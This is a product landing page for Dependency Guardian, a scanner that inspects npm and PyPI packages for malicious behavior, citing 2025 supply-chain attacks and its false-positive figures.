Dependency Guardianby WestBayBerry

Malicious packages do not wait for advisories.

Modern software is built on code written by strangers. Dependency Guardian finds dangerous package behavior before it reaches your systems.

The tools developers trust are missing real attacks

Every application depends on hundreds of open source packages. Building blocks of code shared freely online. When an attacker slips malicious code into one of these packages, it spreads to thousands of companies and developers who use it.

The gap

Advisory scanners ask:
Has this been reported?
Dependency Guardian asks:
What is this package actually doing?

What happened

2025 Shai Hulud 500+ packages, credential theft, impact across 25,000+ projects.
2025 Chalk + Debug hijack Compromised high usage packages with 2.6B combined weekly downloads.
2025 S1ngularity campaign 2,349 developer credentials stolen from 1,079 systems.

In late 2025, an attack called Shai Hulud infected over 500 widely used software packages, including tools from CrowdStrike with millions of weekly users. It stole developer credentials and leaked them across 25,000+ projects. A follow up wave hit packages from Zapier, PostHog, and Postman.

The Chalk and Debug hijack affected packages with 2.6 billion combined weekly downloads. The S1ngularity campaign stole 2,349 developer credentials from 1,079 systems. New malicious packages land on npm and PyPI every day; many sit for hours or days before they're flagged in any advisory database.

What we learned

The registry is not enough. The code has to be inspected before it reaches your build.

The standard tools missed it because there was no advisory yet.

Dependency Guardian behavior analysis flow

We inspect package behavior, not just advisory databases

Static + behavioral Catch rate by attack class Detailed per class TPR + FPR numbers on the benchmark page, measured against an in repo validation corpus.
<1% False positive rate Tested against 3,967 clean packages from npm and PyPI (0.38% combined FPR: 0.44% npm, 0.29% PyPI)
Full Behavioral engine File scanning and metadata detectors; cross detector rules

Dependency Guardian reads the actual source code of every package. It looks for stealing passwords, sending data to unknown servers, hiding code behind obfuscation, installing itself where it shouldn't be.

Detectors run on every scan. Cross detector rules combine signals to catch attacks that use multiple techniques together. Suspicious packages can be routed to an isolated sandbox to observe what they actually do.

Try the Scanner Read the Docs